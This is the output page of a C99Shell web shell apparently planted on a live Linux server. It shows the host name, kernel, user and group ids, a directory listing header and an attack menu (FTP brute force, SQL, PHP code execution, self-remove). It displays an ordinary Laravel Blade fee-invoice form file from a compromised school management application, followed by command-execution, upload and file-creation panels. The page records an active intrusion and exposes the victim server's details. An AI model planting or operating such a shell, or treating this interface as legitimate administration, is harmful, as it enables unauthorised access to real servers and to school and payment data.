!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/school.picotech.app/public_html/resources/views/admin/student_fee_manager/   drwxr-xr-x
Free 29.42 GB of 117.98 GB (24.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     mass.blade.php (3.47 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<form method="POST" enctype="multipart/form-data" class="d-block ajaxForm" action="{{ route('admin.create.fee_manager', ['value' => 'mass']) }}">
    @csrf 
    <div class="form-row">
        <div class="fpb-7">
            <label for="class_id_on_create" class="eForm-label">{{ get_phrase('Class') }}</label>
            <select name="class_id" id="class_id_on_create" class="form-select eForm-select eChoice-multiple-with-remove"  required onchange="classWiseSectionOnCreate(this.value)">
                <option value="">{{ get_phrase('Select a class') }}</option>
                @foreach($classes as $class)
                      <option value="{{ $class['id'] }}">{{ $class['name'] }}</option>
                @endforeach
            </select>
        </div>

        <div class="fpb-7">
            <label for="section_id_on_create" class="eForm-label">{{ get_phrase('Section') }}</label>
            <select name="section_id" id = "section_id_on_create" class="form-select eForm-select eChoice-multiple-with-remove" required>
                <option value="">{{ get_phrase('Select section') }}</option>
            </select>
        </div>

        <div class="fpb-7">
            <label for="title" class="eForm-label">{{ get_phrase('Invoice title') }}</label>
            <input type="text" class="form-control eForm-control" id="title" name="title" required>
        </div>

        <div class="fpb-7">
            <label for="total_amount" class="eForm-label">{{ get_phrase('Total amount').'('.school_currency().')' }}</label>
            <input type="number" class="form-control eForm-control" id="total_amount" name="total_amount" required>
        </div>

        <div class="fpb-7">
            <label for="paid_amount" class="eForm-label">{{ get_phrase('Paid amount').'('.school_currency().')' }}</label>
            <input type="number" class="form-control eForm-control" id="paid_amount" name="paid_amount" required>
        </div>

        <div class="fpb-7">
            <label for="status" class="eForm-label">{{ get_phrase('Status') }}</label>
            <select name="status" id="status" class="form-select eForm-select eChoice-multiple-with-remove" required >
                <option value="">{{ get_phrase('Select a status') }}</option>
                <option value="paid">{{ get_phrase('Paid') }}</option>
                <option value="unpaid">{{ get_phrase('Unpaid') }}</option>
            </select>
        </div>

        <div class="fpb-7">
            <label for="payment_method" class="eForm-label">{{ get_phrase('Payment method') }}</label>
            <select name="payment_method" id="payment_method" class="form-select eForm-select eChoice-multiple-with-remove">
                <option value="">{{ get_phrase('Select a payment method') }}</option>
                <option value="cash">{{ get_phrase('Cash') }}</option>
                <option value="paypal">{{ get_phrase('Paypal') }}</option>
                <option value="paytm">{{ get_phrase('Paytm') }}</option>
                <option value="razorpay">{{ get_phrase('Razorpay') }}</option>
                <option value="stripe">{{ get_phrase('Stripe') }}</option>
                <option value="flutterwave">{{ get_phrase('Flutterwave') }}</option>
                <option value="paystack">{{ get_phrase('Paystack') }}</option>
            </select>
        </div>

    </div>
    <div class="fpb-7 pt-2">
        <button class="btn-form" type="submit">{{ get_phrase('Create invoice') }}</button>
    </div>
</form>

<script type="text/javascript">

  "use strict";

    
    function classWiseSectionOnCreate(classId) {
        let url = "{{ route('admin.class_wise_sections', ['id' => ":classId"]) }}";
        url = url.replace(":classId", classId);
        $.ajax({
            url: url,
            success: function(response){
                $('#section_id_on_create').html(response);
            }
        });
    }

  $(document).ready(function () {
    $(".eChoice-multiple-with-remove").select2();
  });

</script>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.003 ]--